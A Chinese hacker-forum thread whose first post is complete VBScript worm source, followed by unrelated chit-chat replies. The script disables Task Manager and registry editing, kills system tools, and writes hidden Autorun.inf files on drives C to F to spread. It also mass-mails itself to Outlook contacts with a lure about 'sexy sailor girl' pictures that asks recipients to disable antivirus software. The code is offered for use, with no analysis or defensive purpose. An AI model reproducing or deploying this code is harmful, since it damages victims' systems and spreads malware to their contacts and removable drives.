设为首页收藏本站
查看: 1955|回复: 6

[脚本语言] vbs病毒

[复制链接]
  • TA的每日心情
    开心
    2024-2-7 16:42
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2023-12-9 21:07:33 | 显示全部楼层 |阅读模式
    on error resume next
    set wshshell=wscript.createobject("wscript.shell")
    set fso=wscript.createobject("scripting.filesystemobject")
    set myfile=fso.getfile(wscript.scriptfullname)
    set ol=createobject("outlook.application")
    set mail=ol.createitem(0)
    wshshell.run "https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Command Processor\Autorun","exit"
    wshshell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
    wshshell.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr",1,"REG_DWORD"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\auto\command\","C:\Script.Girl.vbs"
    wshshell.regwrite "HKEY_CLASSES_ROOT\Drive\shell\","auto"
    wshshell.regwrite "HKEY_CLASSES_ROOT\Drive\shell\auto\command\","C:\Script.Girl.vbs"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\","auto"
    wshshell.regwrite "HKEY_CLASSES_ROOT\Directory\shell\auto\command\","C:\Script.Girl.vbs"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\auto\command\","C:\Script.Girl.vbs"
    wshshell.regwrite "HKEY_CLASSES_ROOT\exefile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_CLASSES_ROOT\txtfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_CLASSES_ROOT\batfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_CLASSES_ROOT\inifile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg\","txtfile"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","Hello!Let me play a little joke on you"
    wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","Your computer has been infected with a virus!Kill the virus!Quickly antivirus or reinstall the computer!"
    myfile.copy "C:"
    myfile.copy "D:"
    myfile.copy "E:"
    myfile.copy "F:"
    set t1=fso.createtextfile("C:\Autorun.inf",true)
    t1.writeline("[AutoRun]")
    t1.writeline("open=Script.Girl.vbs")
    t1.writeline("shellexecute=Script.Girl.vbs")
    t1.writeline("shell\Auto\command=Script.Girl.vbs")
    t1.writeline("[AutoRun]")
    t1.writeline("open=Script.Girl.exe")
    t1.writeline("shellexecute=Script.Girl.exe")
    t1.writeline("shell\Auto\command=Script.Girl.exe")
    set t2=fso.createtextfile("D:\Autorun.inf",true)
    t2.writeline("[AutoRun]")
    t2.writeline("open=Script.Girl.vbs")
    t2.writeline("shellexecute=Script.Girl.vbs")
    t2.writeline("shell\Auto\command=Script.Girl.vbs")
    t2.writeline("[AutoRun]")
    t2.writeline("open=Script.Girl.exe")
    t2.writeline("shellexecute=Script.Girl.exe")
    t2.writeline("shell\Auto\command=Script.Girl.exe")
    set t3=fso.createtextfile("E:\Autorun.inf",true)
    t3.writeline("[AutoRun]")
    t3.writeline("open=Script.Girl.vbs")
    t3.writeline("shellexecute=Script.Girl.vbs")
    t3.writeline("shell\Auto\command=Script.Girl.vbs")
    t3.writeline("[AutoRun]")
    t3.writeline("open=Script.Girl.exe")
    t3.writeline("shellexecute=Script.Girl.exe")
    t3.writeline("shell\Auto\command=Script.Girl.exe")
    set t4=fso.createtextfile("F:\Autorun.inf",true)
    t4.writeline("[AutoRun]")
    t4.writeline("open=Script.Girl.vbs")
    t4.writeline("shellexecute=Script.Girl.vbs")
    t4.writeline("shell\Auto\command=Script.Girl.vbs")
    t4.writeline("[AutoRun]")
    t4.writeline("open=Script.Girl.exe")
    t4.writeline("shellexecute=Script.Girl.exe")
    t4.writeline("shell\Auto\command=Script.Girl.exe")
    wshshell.run "cmd /c attrib +h C:\Autorun.inf"
    wshshell.run "cmd /c attrib +h D:\Autorun.inf"
    wshshell.run "cmd /c attrib +h E:\Autorun.inf"
    wshshell.run "cmd /c attrib +h F:\Autorun.inf"
    wshshell.run "cmd /c taskkill -f -im cmd.exe"
    wshshell.run "cmd /c taskkill -f -im notepad.exe"
    wshshell.run "cmd /c taskkill -f -im regedit.exe"
    wshshell.run "cmd /c taskkill -f -im taskmgr.exe"
    for x=1 to 10
    mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x)
    mail.subject="Cute and sexy sailor girl"
    mail.body="Would you like to see more pictures of sailor girls?The installer is in the attachment.Setup does not write the publisher.Please turn off the antivirus software before installing it"
    mail.attachments.add("https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43")
    mail.attachments.add("C:\Script.Girl.vbs")
    mail.attachments.add("C:\Script.Girl.exe")
    mail.send
    next
  • TA的每日心情
    擦汗
    昨天 23:03
  • 签到天数: 884 天

    [LV.10]以坛为家III

    发表于 2023-12-11 23:24:52 | 显示全部楼层
    好久没看到活人了!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2023-12-14 22:25
  • 签到天数: 836 天

    [LV.10]以坛为家III

    发表于 2023-12-14 22:26:00 | 显示全部楼层
    幻剑游云 发表于 2023-12-11 23:24
    好久没看到活人了!

    到底发生了什么?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    昨天 23:03
  • 签到天数: 884 天

    [LV.10]以坛为家III

    发表于 2023-12-15 23:09:29 | 显示全部楼层

    两次整改,一次合作,一次大删帖,一次强制实名,一次换域名,你说哪个?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    前天 08:24
  • 签到天数: 368 天

    [LV.9]以坛为家II

    发表于 2023-12-16 13:17:10 | 显示全部楼层
    幻剑游云 发表于 2023-12-11 23:24
    好久没看到活人了!

    哈哈,我还在。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    昨天 23:03
  • 签到天数: 884 天

    [LV.10]以坛为家III

    发表于 2023-12-16 20:08:12 | 显示全部楼层

    偏爱没看见你呢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    前天 08:24
  • 签到天数: 368 天

    [LV.9]以坛为家II

    发表于 2023-12-17 12:47:07 | 显示全部楼层

    主要是我不怎么发帖
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    红盟社区--红客联盟 

    Processed in 0.058071 second(s), 21 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    备案号:冀ICP备20006029号-1 Powered by HUC © 2001-2021 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表